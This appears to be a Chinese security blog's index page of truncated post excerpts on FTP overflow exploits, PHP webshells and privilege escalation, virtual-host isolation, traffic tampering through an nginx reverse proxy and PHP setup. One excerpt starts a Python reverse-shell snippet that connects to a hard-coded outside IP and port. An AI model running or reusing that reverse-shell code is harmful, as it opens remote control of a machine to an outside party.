asyncore模块是封装过的处理socket事件的模块，在文档中搜索可以看到这样的说明： Basic infrastructure for asynchronous socket service clients and servers. Th...

    继XX同学上个学期对PCMAN FTP这个软件进行了残暴的溢出测试（溢出点是FTP用户名，版本不清楚），我也开始学习逆向和溢出，谷歌上搜索pcman's ftp，找到了这个溢出exploit：http:/...

    python在linux下的反弹shell代码我相信很多人都见过： import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('59.188.234.64',14575)) o...

    众所周知，虚拟主机的安全不好做，特别是防止跨站成为了重点。apache+php服务器防止跨站的方式比较简单，网上的所有成熟虚拟主机解决方案都是基于apache的，如directadmin、cpane...

    linux下，有时候拿到webshell需要提权，提权必须要得到一个交互式的shell。     我看了一下常用的php webshell，对于命令执行、反弹shell都没有完善的方式。很多web...

    网上的webshell总结起来有一些缺陷：     1.兼容性差，当某函数禁用后，该功能就不能用了。其实php是个很灵活的语言，很多功能是可以有很多实现方式的。   ...

无意中看到了这篇文章：http://www.freebuf.com/articles/system/49428.html 对于下面我莫名其妙中枪的事。。。我就不多说了： 于是我详细地把文章看了一遍，文章比较基础但也不失为一个引导新...

0x01 起因 几天前学弟给我介绍他用nginx搭建的反代，代理了谷歌和维基百科。  由此我想到了一些邪恶的东西：反代既然是所有流量走我的服务器，那我是不是能够在中途做些手脚，达到一些有趣的目...

不知道什么时候突然发现我已经稳定运行了近半年的sec-news（http://wiki.ioin.in）突然变得特别慢，为跳转效率我也是尝试了很多方法，比如加缓存。我使用了一个叫flask-cache的缓存: https://p...

【过年了，每天发一篇以前的存货，一共七篇。】 思路是，先用源，安装好php5和php5所依赖的所有项目，再安装phpbrew，通过phpbrew管理php版本，并安装7.0.0。 首先安装一些依赖 apt-get install...